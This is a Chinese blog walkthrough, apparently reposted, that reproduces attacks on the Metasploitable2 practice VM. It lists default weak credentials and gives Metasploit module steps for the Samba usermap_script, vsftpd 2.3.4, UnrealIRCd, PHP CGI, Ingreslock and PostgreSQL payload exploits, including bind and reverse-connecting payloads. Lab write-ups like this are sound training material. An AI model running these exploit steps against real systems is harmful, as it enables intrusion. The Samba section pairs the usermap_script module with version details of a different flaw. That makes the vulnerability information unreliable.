Metasploitable2靶机漏洞复现

这篇具有很好参考价值的文章主要介绍了Metasploitable2靶机漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、信息收集

nmap扫描靶机信息

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 文章来源地址https://www.toymoban.com/news/detail-651405.html

二、弱口令

1.系统弱口令

在Kali Linux中使用telnet远程连接靶机

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 输入账号密码msfadmin即可登录

2.MySQL弱口令

使用mysql -h 靶机IP地址即可连接

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

3.PostgreSQL弱密码登录

输入psql -h 192.168.110.134 -U postgres

密码为postgres

输入\q可以退出

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

4.VNC弱口令

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

二、漏洞利用

一下漏洞利用工具基本均为MSF

1.Samba MS-RPC Shell命令注入

此漏洞允许远程攻击者在易受攻击的Samba服务器上上传和执行恶意代码。它影响了Samba版3.5.0到4.6.4(包括在内),并随Samba 4.6.5的发布进行了修补。

1.使用模块

use exploit/multi/samba/usermap_script


2.设置参数

set rhost 靶机IP地址


3.执行

run


4.执行命令查看目录

ls

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

2.vsftpd后门

vsftpd后门漏洞指的是vsftpd(Very Secure FTP Daemon)软件的一个安全漏洞,也被称“Backdoor-VSFTPd”或“vsftpd 2.3.4 Backdoor”。

这个漏洞最初发现于2011年,并影响了vsftpd版本2.3.4。攻击者可以利用该漏洞通过一个特定的用户名进行登录,然后在无需经过认证的情况下获得系统访问权限。

1.MSF中使用以下模块

use exploit/unix/ftp/vsftpd_234_backdoor


2.设置靶机IP

set rhost 靶机IP


3.执行并查看

run

ls

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

3.UnreallRCd后门

UnrealIRCd是一种常见的开源IRC服务器软件,被用于构建IRC(Internet Relay Chat)网络。在过去的几年中,UnrealIRCd曾发现过一个后门漏洞,被称为“UnrealIRCd后门”或“Unreal3.2.8.1Backdoor”。

这个后门漏洞于2010年被公开揭露。攻击者利用这个后门可以在受影响的UnrealIRCd服务器上获取远程执行代码的权限,也可以用于执行各种恶意活动,如监控聊天内容、获取敏感信息等。

1.搜索模块

search unreal ircd


2.搜索payload,并使用一下payload

cmd/unix/bind_perl    


3.设置参数

set rhost 靶机IP地址


4.执行run

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

4.PHP CGI参数注入执行漏洞

PHP CGI 参数注入执行漏洞是一种安全漏洞,它影响在以 CGI 模块方式运行的 Web 服务器上的PHP 程序。该漏洞的根本原因是在使用 CGI 模块处理 PHP 脚本时,未正确过滤和处理用户输入导致的参数注入漏洞。

攻击者利用这个漏洞可以通过特制的 URL 参数注入恶意代码,执行任意的命令或访问系统敏感文件,甚至可能导致服务器完全被入侵控制。

1.搜索模块

srach php_cgi


2.使用模块并设置参数

use exploit/multi/http/php_cgi_arg_injection

set rhost 靶机IP地址


3.执行

run

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

5.Ingreslock后门

Ingreslock后门程序运行在1524端口,连接到1524端口就能直接获得root权限,经常用于入侵一个暴露的服务器;直接使用telnet命令获取权限

Metasploitable2靶机漏洞复现,渗透测试与安全攻防,渗透测试,web安全,系统安全,安全,漏洞挖掘,服务器,漏洞复现

 

6.Postgres共享库代码任意执行

1.搜索模块

use exploit/linux/postgres/postgres_payload  


2.设置参数

set rhost 靶机IP

set lhost kali的IP

3.执行参数
run

到了这里,关于Metasploitable2靶机漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

    特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。 前言: 我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell 这次我们用框架来尝试两种不同方法拿到shell 思路清晰,先说步骤 1.信息收集

    2024年02月02日
    浏览(52)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(43)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(36)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(33)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(30)
  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(38)
  • Neos的渗透测试靶机练习——DarkHole-2

    1. 搜集信息 输入 sudo su ,将kali切换到 root权限 ; 输入 ifconfig 查询自身ip,即 攻击机ip ; 可以看到 自身ip 为 192.168.56.101 。 输入 arp-scan -l 扫描本网段存活主机,即 靶机ip地址 。 可以看到 靶机ip 为 192.168.56.105 ,。 输入 nmap -sV -p- 192.168.56.105 扫描靶机 所有端口开放情况 。

    2024年01月23日
    浏览(48)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • 网络安全竞赛——综合靶机渗透测试ZHCS-2全过程解析教程

    任务一:综合靶机渗透测试 任务环境说明: 服务器场景:ZHCS-2(关闭连接) 服务器场景操作系统:版本不详 扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23)   FLAG:22,80 扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)   FLAG: lighttpd 1.

    2024年02月09日
    浏览(40)
  • 手把手教你kali渗透Metasploitable

    2.ifconfig查看Metasploitable的IP: 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP //注意路径是桌面还是Desktop 二、 爆破SSH 利用爆破得到的用户名和密码,进行远程连接测试: 成功连接: 三、端口渗透: 利用metasploit 然后在kali linux中进行渗透: 启动msf msf

    2024年02月06日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包